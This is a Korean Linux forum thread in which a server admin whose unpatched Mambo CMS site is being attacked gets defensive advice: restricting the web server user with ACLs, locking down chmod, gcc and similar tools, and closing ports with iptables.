저같은 경우는 ACL을 사용해서 /bin/sh을 제외한 모든 실행가능한 바이너리 파일들에 nobody가 접근하지 못하도록 설정했습니다. 그리고 FTP 설정에서 유저가 퍼미션을 변경하지 못하도록하고 마지막으로 IPTABLE을 사용해서 서비스중인 포트 외에는 외부에서 들어오지 못하도록 막았습니다.

ACL에 대해 당장 검색하러 가봐야겠습니다. +_+

그리고 웹호스팅 같은경우에는 유저가 퍼미션을 조절하지 못하도록 한다면 상당한 제약일것 같은데요.

웹호스팅같은 불특정다수에대한 서비스가 아니라면 큰 문제되지는 않겠지만요.

조만간 저희서버도 chroot디렉토리이상 침투못하도록 작업을 해야 할 것 같습니다.
귀찮아서 안하고 있었는데.. 추륵 ㅜ.ㅡ

불특정 다수에 대한 서비스나, 무슨 대단한 호스팅은 아니고요.
그냥 있는 T1 에 서버 넣어둔 것이 하나 있는데,
그 서버에 아는 분들이 웹호스팅을 부탁하셔서
돈 안 받고 넣어준 것들입니다.
어차피 웹 프로그래밍하시는 분들이 아니니까
제가 Mambo라는 CMS를 설치해서 컨텐츠는 자기네가
관리하게 되어 있는 것인데, Mambo 4.5.2에 보안 구멍이
있는 것이 몇달전에 발견되었었는데 제가 그것을 사용하는
6개 도메인 중 5개 도메인은 보안 문제가 해결된 새로운
버전으로 올리고 딱 하나만 올리지 않았 거든요, 잘도 알고
그 도메인을 공격하고 있네요. 게다가 그것은 제것 이에요!

저는 웹에서의 보안이란 것은 그냥 웹 서비스 파일 들
정도에만 문제가 되는 줄 알았었어요.....쩝. 그것이
시스템 전체에 영향을 미칠 수 있다는 것을 몰랐습니다.

다행히 ftp는 제 가짜 아이디(쉘을 막아둔-웹 서버에서 대단한 소용은
없는 것 저도 압니다 -,.-) 하나 밖에 없고 나머지분들은 그저
CMS 기능을 사용해서 간단한 컨텐츠를 오래전에 넣어둔 것이
전부입니다. 그래서 superkkt님의 방식을 사용할 수 있습니다.

아마도 새로 깔고 superkkt님의 방법을
사용하는 것이 제일 간단한 방법이지 않나
생각이 드네요. 그런데 superkkt님의 방법 중 ACL도 사용하지만
아예 www-data(웹 서버의 사용자명)의 쉘을 /bin/sh에서
/bin/false 처럼 없애버리면 웹 서비스하는데 문제가 될까요?
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
논리적으로 PHP에서 쉘을 사용할 필요가 있어야
그부분이 문제가 될테니 막는다면 서비스에 문제가 되거나
막아도 문제가 되지 않는다면 원래부터 문제가 되지 않겠군요...

예전에는 CMS의 관리자 디렉터리는 아파치 패스워드로
막아 두었었는데 요즈음은 그것도 별 소용이 없는 듯해서
그냥 내버려 두었었거든요.

Mambo나 Mambo에서 갈라져 나온 Joomla는 유럽에서는
상당히 많은 사람들이 사용하는 CMS이다보니 공격 대상 중
하나가 되나보군요. Mambo Site에 올려 놓은
4.5.2 한국어 파일 받아가신 분들이 있던데....
그리고 Joomla로 갈라져 나올때 Joomla에만 새로운 버전
한글 파일 올려 놓았는데...음....

George double you Bush has two brains, the left and the right, like normal people. But the problem is that there is nothing right in his left brain and there is nothing left in his right brain"

superkkt의 이미지

opiokane wrote:
오리주둥이 wrote:
superkkt wrote:
서버 용도가 정확히 뭔지 모르겠지만 일단은 관리자가 제어할 수 있는 웹사이트 하나만 돌아가는 서버는 아닌듯 싶네요. 이런 경우라면 그냥 nobody 권한은 공격자에게 넘겨줬다고 생각하고 관리를 하는게 정신건강에 좋습니다.

그럼 관리자가 할 일은 nobody 권한을 획득한 공격자를 어떻게 효율적으로 막아서 권한상승을 하지 못하도록하냐인데.. 여기에는 여러가지 방법이 있을겁니다.

저같은 경우는 ACL을 사용해서 /bin/sh을 제외한 모든 실행가능한 바이너리 파일들에 nobody가 접근하지 못하도록 설정했습니다. 그리고 FTP 설정에서 유저가 퍼미션을 변경하지 못하도록하고 마지막으로 IPTABLE을 사용해서 서비스중인 포트 외에는 외부에서 들어오지 못하도록 막았습니다.

ACL에 대해 당장 검색하러 가봐야겠습니다. +_+

그리고 웹호스팅 같은경우에는 유저가 퍼미션을 조절하지 못하도록 한다면 상당한 제약일것 같은데요.

웹호스팅같은 불특정다수에대한 서비스가 아니라면 큰 문제되지는 않겠지만요.

조만간 저희서버도 chroot디렉토리이상 침투못하도록 작업을 해야 할 것 같습니다.
귀찮아서 안하고 있었는데.. 추륵 ㅜ.ㅡ

불특정 다수에 대한 서비스나, 무슨 대단한 호스팅은 아니고요.
그냥 있는 T1 에 서버 넣어둔 것이 하나 있는데,
그 서버에 아는 분들이 웹호스팅을 부탁하셔서
돈 안 받고 넣어준 것들입니다.
어차피 웹 프로그래밍하시는 분들이 아니니까
제가 Mambo라는 CMS를 설치해서 컨텐츠는 자기네가
관리하게 되어 있는 것인데, Mambo 4.5.2에 보안 구멍이
있는 것이 몇달전에 발견되었었는데 제가 그것을 사용하는
6개 도메인 중 5개 도메인은 보안 문제가 해결된 새로운
버전으로 올리고 딱 하나만 올리지 않았 거든요, 잘도 알고
그 도메인을 공격하고 있네요. 게다가 그것은 제것 이에요!

저는 웹에서의 보안이란 것은 그냥 웹 서비스 파일 들
정도에만 문제가 되는 줄 알았었어요.....쩝. 그것이
시스템 전체에 영향을 미칠 수 있다는 것을 몰랐습니다.

다행히 ftp는 제 가짜 아이디(쉘을 막아둔-웹 서버에서 대단한 소용은
없는 것 저도 압니다 -,.-) 하나 밖에 없고 나머지분들은 그저
CMS 기능을 사용해서 간단한 컨텐츠를 오래전에 넣어둔 것이
전부입니다. 그래서 superkkt님의 방식을 사용할 수 있습니다.

아마도 새로 깔고 superkkt님의 방법을
사용하는 것이 제일 간단한 방법이지 않나
생각이 드네요. 그런데 superkkt님의 방법 중 ACL도 사용하지만
아예 www-data(웹 서버의 사용자명)의 쉘을 /bin/sh에서
/bin/false 처럼 없애버리면 웹 서비스하는데 문제가 될까요?
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
논리적으로 PHP에서 쉘을 사용할 필요가 있어야
그부분이 문제가 될테니 막는다면 서비스에 문제가 되거나
막아도 문제가 되지 않는다면 원래부터 문제가 되지 않겠군요...

예전에는 CMS의 관리자 디렉터리는 아파치 패스워드로
막아 두었었는데 요즈음은 그것도 별 소용이 없는 듯해서
그냥 내버려 두었었거든요.

Mambo나 Mambo에서 갈라져 나온 Joomla는 유럽에서는
상당히 많은 사람들이 사용하는 CMS이다보니 공격 대상 중
하나가 되나보군요. Mambo Site에 올려 놓은
4.5.2 한국어 파일 받아가신 분들이 있던데....
그리고 Joomla로 갈라져 나올때 Joomla에만 새로운 버전
한글 파일 올려 놓았는데...음....

웹서버 사용자(www-data)의 로그인 쉘이 뭘로 되어있는지는 별로 중요하지 않습니다. 공격자가 웹서버 사용자 권한으로 쉘을 띄울때는 보통 직접 쉘 바이너리 또는 특정 포트로 쉘을 바인딩하는 소스를 올려서 컴파일하는 경우가 많습니다.

그래서 가장 중요한게 공격자가 웹서버 사용자 권한으로 시스템에 접근했을때 다른 작업을 못하게 만들어야 합니다. 예를들어 자기가 올린 바이너리의 퍼미션을 실행가능하게 변경 후 실행한다던가 아니면 소스를 컴파일 한다던가..

그래서 chmod, chown, gcc, g++ 등의 퍼미션을 웹서버 사용자가 접근하지 못하게 만들면 효율적입니다. 하지만 저는 ACL을 사용해서 조금은 결벽증적인 방법으로 /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin에 있는 모든 파일들에 접근하지 못하게 만들었습니다. 단 /bin/sh은 예외로 둬야 하는데 이것까지 바꿔버리면 PHP가 정상작동 안하는 경우가 생깁니다. 여기에 서비스중인 포트외에는 외부에서 접근할 수 없게 만들면 특정 포트로 쉘을 바인딩한다던가 하는 방법을 사용할 수 없게 만듭니다.

ACL은 특정 유저나 그룹에게만 퍼미션을 지정할 수 있는 기능입니다. 기본 퍼미션은 그대로 유지되고 지정한 유저나 그룹별로 따로 퍼미션을 지정할 수 있습니다. Access Control List로 검색하시면 자료를 찾을 수 있을겁니다. 이 기능이 솔라리스에는 기본적으로 포함되어 있는데 요즘 나오는 리눅스 배포판은 어떤지 모르겠지만 제가 레드햇 8인가 깔아서 쓸때는 포함이 안되어있어서 패치를해서 사용했었습니다.

======================
BLOG : http://superkkt.com

opiokane의 이미지

몇가지 흥미로운 포스팅을 찾았습니다.

http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=ELF_MARE.B
http://lists.belnet.be/wws/arc/cert-alerts/2005-12/msg00012.html
http://www.wormblog.com/

제 서버에 시도하고 있는 것과 완전히 똑 같은 것이 있더군요.

일단 웹서버는 그냥 운영하려고 합니다. 까짓거 들어와 뭔가를 설치했으면
한 것이지요 뭐....디비는 하루에 한번씩 백업을 해서 다른 컴퓨터에
저장을 하게 해 두었고, 스위치에서 네트웍 트래픽을 감시하면서
혹시라도 트래픽이 갑자기 올라가거나 서버에 무슨 일이 생기면
그 때 밀어버리려고 합니다.

밀고 다시 설치할 때는
superkkt님 말씀처럼 chmod, chown, gcc, g++등의 퍼미션을 아예
root만 사용할 수 있게 만들까 생각하고 있습니다.
그리고 말씀하시는 ACL은 파일 시스템 ACL인 것 같은데,
ext2/ext3 에서 모두 사용가능합니다. 아직은 그렇게까지는
하지 않고 두고 싶네요. 서버를 보호하는 것도 필요하긴 하지만,
너무 폐쇄적이 되는 듯한 느낌이 들어서요....

George double you Bush has two brains, the left and the right, like normal people. But the problem is that there is nothing right in his left brain and there is nothing left in his right brain"

댓글 달기

Filtered HTML

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

BBCode

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param>
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

Textile

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • You can use Textile markup to format text.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Markdown

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • Quick Tips:
    • Two or more spaces at a line's end = Line break
    • Double returns = Paragraph
    • *Single asterisks* or _single underscores_ = Emphasis
    • **Double** or __double__ = Strong
    • This is [a link](http://the.link.example.com "The optional title text")
    For complete details on the Markdown syntax, see the Markdown documentation and Markdown Extra documentation for tables, footnotes, and more.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Plain text

  • HTML 태그를 사용할 수 없습니다.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 줄과 단락은 자동으로 분리됩니다.
댓글 첨부 파일
이 댓글에 이미지나 파일을 업로드 합니다.
파일 크기는 8 MB보다 작아야 합니다.
허용할 파일 형식: txt pdf doc xls gif jpg jpeg mp3 png rar zip.
CAPTCHA
이것은 자동으로 스팸을 올리는 것을 막기 위해서 제공됩니다.